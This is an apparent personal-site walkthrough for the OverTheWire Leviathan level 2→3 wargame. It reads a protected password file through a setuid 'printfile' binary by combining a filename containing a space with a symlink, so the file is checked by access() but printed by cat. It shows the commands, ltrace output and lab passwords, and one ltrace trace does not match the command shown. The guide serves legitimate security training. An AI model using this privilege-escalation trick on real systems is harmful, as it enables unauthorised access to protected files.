OverTheWire Leviathan Guide

here's how to solve the leviathan level 2 → 3

Back to the Leviathan Guides

Previous Level Guide: Bandit Level 1 → 2

Access

SSH: ssh leviathan2@leviathan.labs.overthewire.org -p 2223

Password: 9QdXFgQMMo

Info

Description: There is no information for this level, intentionally.

Theory

Not much to do with the details from the task, so just skipping to doing it.

Solution

Because the task doesn't tell us anything about the level, first we will use ls -la to see all files regardless they are hidden and some details of the files/folders:

~$ ls -la
total 36
drwxr-xr-x  2 root       root        4096 Sep 19 07:07 .
drwxr-xr-x 83 root       root        4096 Sep 19 07:09 ..
-rw-r--r--  1 root       root         220 Mar 31  2024 .bash_logout
-rw-r--r--  1 root       root        3771 Mar 31  2024 .bashrc
-r-sr-x---  1 leviathan3 leviathan2 15068 Sep 19 07:07 printfile
-rw-r--r--  1 root       root         807 Mar 31  2024 .profile

Now there's an executable file called printfile which probably just uses cat to print those files, if we don't put a file it tells us the usage:

~$ ./printfile
*** File Printer ***
Usage: /home/leviathan2/printfile filename

If we try to do this with the password file it will know:

./printfile /etc/leviathan_pass/leviathan3
You cant have that file...

So let's create a temporary directory to create a file and put it through this program to see how it works with ltrace, but unlike Bandit, in this one we can only make our own directory, it cannot be mktemp for some weird reason, it just doesn't work with this program. Anyway, let's try with a file of our own:

~$ mkdir /tmp/shukularuni

~$ cd /tmp/shukularuni

/tmp/shukularuni$ touch testign.txt

/tmp/shukularuni$ ls
testign.txt

/tmp/shukularuni$ ltrace ~/printfile testign.txt
__libc_start_main(0x80490ed, 2, 0xffffd434, 0 <unfinished ...>
access("testign.txt", 4)                                                  = 0
snprintf("/bin/cat testign.txt", 511, "/bin/cat %s", "testign.txt")       = 20
geteuid()                                                                 = 12002
geteuid()                                                                 = 12002
setreuid(12002, 12002)                                                    = 0
system("/bin/cat testign.txt" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                    = 0
+++ exited (status 0) +++

So turns out the program uses cat to print the files and access for the files, a vulnerability! This is because if you enter a file with spaces in its filename and put it in it's form where it's surrounded by double quotation marks like "spaces filename.txt" it will think "spaces" and "filename.txt" are two different files, and that's important because that means it won't check for the password file from before, we can verify this with a new file and ltrace again:

/tmp/shukularuni$ touch spaces\ filename.txt

/tmp/shukularuni$ ls
spaces filename.txt  testign.txt

/tmp/shukularuni$ ltrace ~/printfile "spaces filename.txt"
__libc_start_main(0x80490ed, 2, 0xffffd434, 0 <unfinished ...>
access("pass file.txt", 4)                                                = 0
snprintf("/bin/cat pass file.txt", 511, "/bin/cat %s", "pass file.txt")   = 22
geteuid()                                                                 = 12002
geteuid()                                                                 = 12002
setreuid(12002, 12002)                                                    = 0
system("/bin/cat pass file.txt"/bin/cat: pass: No such file or directory
/bin/cat: file.txt: No such file or directory
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                    = 256
+++ exited (status 0) +++

Now we just need to link the spaces file to the password file with the ln command to link the files, and the -s option to make it a symbolic link, or in simple terms a shortcut from our spaces file to the password file:

/tmp/shukularuni$ ln -s /etc/leviathan_pass/leviathan3 /tmp/shukularuni/spaces

/tmp/shukularuni$ ls -la
total 4368
drwxrwxr-x    2 leviathan2 leviathan2    4096 Dec  9 13:05 .
drwxrwx-wt 6510 root       root       4464640 Dec  9 13:05 ..
lrwxrwxrwx    1 leviathan2 leviathan2      30 Dec  9 13:05 spaces -> /etc/leviathan_pass/leviathan3
-rw-rw-r--    1 leviathan2 leviathan2       0 Dec  9 13:04 spaces filename.txt
-rw-rw-r--    1 leviathan2 leviathan2       0 Dec  9 13:04 testign.txt

Now we just need the first one, aka "spaces", to link to the password file and get the password:

/tmp/shukularuni$ ~/printfile "spaces filename.txt"
M4nEAjAXgk
/bin/cat: file.txt: No such file or directory

And that's our password! Now you can exit and go to the next level.

If you're really paranoid, you can always use the rm command to remove your files, or use the -r option on it to remove the entire freaking folder, also make sure if you're deleting the folder to cd into somewhere else, because while I don't exactly know what happens when you delete a folder you're in, it might be more secure to just leave before doing so. Really quick, just like this:

/tmp/shukularuni$ cd ..

/tmp$ rm -r shukularuni

/tmp$ cd shukularuni
-bash: cd: shukularuni: No such file or directory

There we go, the directory doesn't exist anymore, now your worries of your temporary folder being kept there are gone!

https://overthewire.org/wargames/leviathan/leviathan3.html
Next Level Guide: Leviathan Level 3 → Level 4

Explore My Website